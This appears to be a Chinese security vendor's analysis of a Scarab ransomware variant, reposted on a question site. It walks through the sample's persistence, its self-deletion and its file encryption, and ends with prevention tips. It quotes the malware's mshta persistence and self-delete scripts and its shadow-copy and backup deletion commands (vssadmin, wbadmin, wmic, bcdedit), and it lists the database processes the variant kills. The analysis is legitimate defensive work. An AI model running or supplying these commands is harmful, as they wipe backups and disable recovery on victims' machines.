msftesql.exe是什么文件(Scarab勒索病毒变种来袭)
一、事件背景
【勒索病毒样本】Scarab勒索病毒变种来袭。最近接到应急响应客户被勒索病毒攻击,深信服EDR安全团队捕获到相应的恶意样本,经分析确认此样本为Scarab勒索病毒变种样本。
Scarab勒索病毒是利用Necurs僵尸网络进行传播,Necurs是世界上最大的僵尸网络之一,曾用于传播多个恶意家族样本,最新变种主要通过RDP爆破+人工植入的方式传播感染主机。
爆破的相关日志,如下:
二、样本分析
(1)样本通过GetKeyboardType获取当前用户键盘类型,如下:
(2)进行一连串的字符串解密操作,得到程序的一些加密配置信息等,如下:
(3)打开注册表项HKEY_CURRENT_USER\Software\ILRTISo,如下:
查询idle注册表项,是否设置,如下:
(4)拷贝自身到%APPDATA%\Roaming目录下,并重命名为sevnz.exe,如下:
通过CreateProcess调用cmd.exe命名执行:
/c copy /y [Virus文件名路径] %APPDATA%\sevnz.exe,如下:
病毒母体拷贝自身到%APPDATA%目录下sevnz.exe,如下:
(5)查询%APPDATA%目录下是否存在sevnz.exe程序,如下:
然后自己传入参数“runas”,并调用ShellExecuteW生成一个新的进程,如下:
(6)执行%APPDATA%目录下的sevnz.exe程序,如下:
(7)sevnz.exe通过CreateProcess调用cmd.exe命名执行:
mshta.exe javascript:o=newActiveXObject(‘Scripting.FileSystemObject’);setInterval(function(){try{o.DeleteFile(‘[FileName.exe]’);close()}catch(e){}},10);
删除母体文件,动态调试,如下:
(8)母体样本通过删除sevnz.exe,来判断之前的sevnz.exe是否启动,如下:
如果程序已启动,删除会失败,如下:
(9)当sevnz.exe在运行之中时,调用JavaScript脚本,将此进程添加到注册表的auto-run,相应的脚本命令:
mshta.exe“javascript:o=new ActiveXObject(‘WScript.Shell’);
x=newActiveXObject(‘Scripting.FileSystemObject’);
setInterval(function(){try{i=x.GetFile(‘sevnz.exe’).Path;
o.RegWrite(‘HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\ILRTISo’,i);}
catch(e){}},10);
动态调试跟踪,如下:
自启动项创建完成之后,如下:
(10)创建加密线程,执行勒索病毒的主要加密流程,如下:
(11)通过JavaScript脚本读取注册表项HKEY_CURRENT_USER\Software\JBGUJ中的键值,然后执行里面的命令,如下:
注册表项中相关的命令脚本如下:
o=new ActiveXObject("WScript.Shell");
o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);
o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);
o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);
o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);
o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);
通过上面的脚本命令,删除磁盘卷影文件,防止用户恢复文件
(12)启动线程,执行加密流程,如下:
(13)遍历主机进程列表,发现如下进程列表,则结束,相关的进程列表如下:
agntsvc.exe;isqlplussvc.exe;ncsvc.exe;msftesql.exe;sqlagent.exe;sqlbrowser.exe;sqlservr.exe;sqlserver.exe;sqlwriter.exe;oracle.exe;ocssd.exe;dbsnmp.exe;synctime.exe;mydesktopqos.exe;agntsvc.exeisqlplussvc.exe;xfssvccon.exe;mydesktopservice.exe;ocautoupds.exe;agntsvc.exeagntsvc.exe;agntsvc.exeencsvc.exe;firefoxconfig.exe;tbirdconfig.exe;ocomm.exe;mysqld.exe;mysqld-nt.exe;mysqld-opt.exe;dbeng50.exe;sqbcoreservice.exe;
动态调试,得到相关的进程列表如下:
结束进程的代码如下:
(14)加密文件的主函数过程代码,如下:
(15)删除HKEY_CURRENT_USER\Software\JBGUJ注册表项的内容,如下:
(16)加密流程执行完成之后,原文件变为了scarab后缀的文件,如下:
同时弹出相关的勒索信息,如下:
三、预防措施
同时深信服EDR安全团队提醒用户:
1.不要点击来源不明的邮件以及附件
2.及时给电脑打补丁,修复漏洞
3.不从垃圾网站或不明网站下载软件
4.安装专业的终端/服务器安全防护软件
5.此勒索病毒变种主要通过RDP爆破的方式,建议用户及时修改密码
- 1bat的大数据(BAT的大数据来源)
- 2三星s8屏幕上端2(三星s8屏幕上端2个按键)
- 3三星屏幕坏了如何导出(三星屏幕摔坏了如何导出数据么)
- 4红米3x怎么关闭自动更新(红米k40s怎么关闭自动更新)
- 5微信上防止app自动下载软件怎么办(微信上防止app自动下载软件怎么办啊)
- 6押镖多少钱(押镖一个月有多少储备金)
- 7瑞星个人防火墙胡功能(瑞星个人防火墙协议类型有哪些)
- 8cf现在等级是多少(cf等级2020最新)
- 9老滑头多少条鱼(钓鱼老滑头有什么用)
- 10WPS自动调整语法(wps如何修改语法)
- 11dell控制面板防火墙(dell的防火墙怎么关闭)
- 12丑女技能升多少(丑女技能需要满级吗)
- 13智能家居系统怎么样(智能家居系统好吗)
- 14戴尔屏幕(戴尔屏幕闪烁)
- 15y85屏幕信息(vivoy85息屏显示时间怎么设置)
- 16魅蓝note3屏幕出现方格(魅蓝note屏幕竖条纹)
- 17v8手指按屏幕(触屏手指)
- 18金为液晶广告机(液晶广告机lb420)
- 19三星显示器怎么校色(三星显示器 调色)
- 20hkc显示器dvi音频(hkc显示器有音响么)
- 21康佳液晶智能电视机(康佳液晶智能电视机怎么样)
- 22做液晶画板电脑(做液晶画板电脑怎么操作)
- 23液晶屏极化现象原理(液晶屏极化现象原理是什么)
- 24企业网络安全防火墙(企业网络防护)
- 256splus黑屏屏幕不亮(苹果6s plus屏幕突然黑屏)
- 26充电导致屏幕失灵(充电导致屏幕失灵怎么办)
- 27超极本屏幕旋转(笔记本电脑屏幕旋转,怎么转过来?)
- 28igmp防火墙(防火墙配置ipv6)
- 29荣耀王者多少经验(王者荣耀经验多少一级)
- 30lol老将还剩多少(qg老将)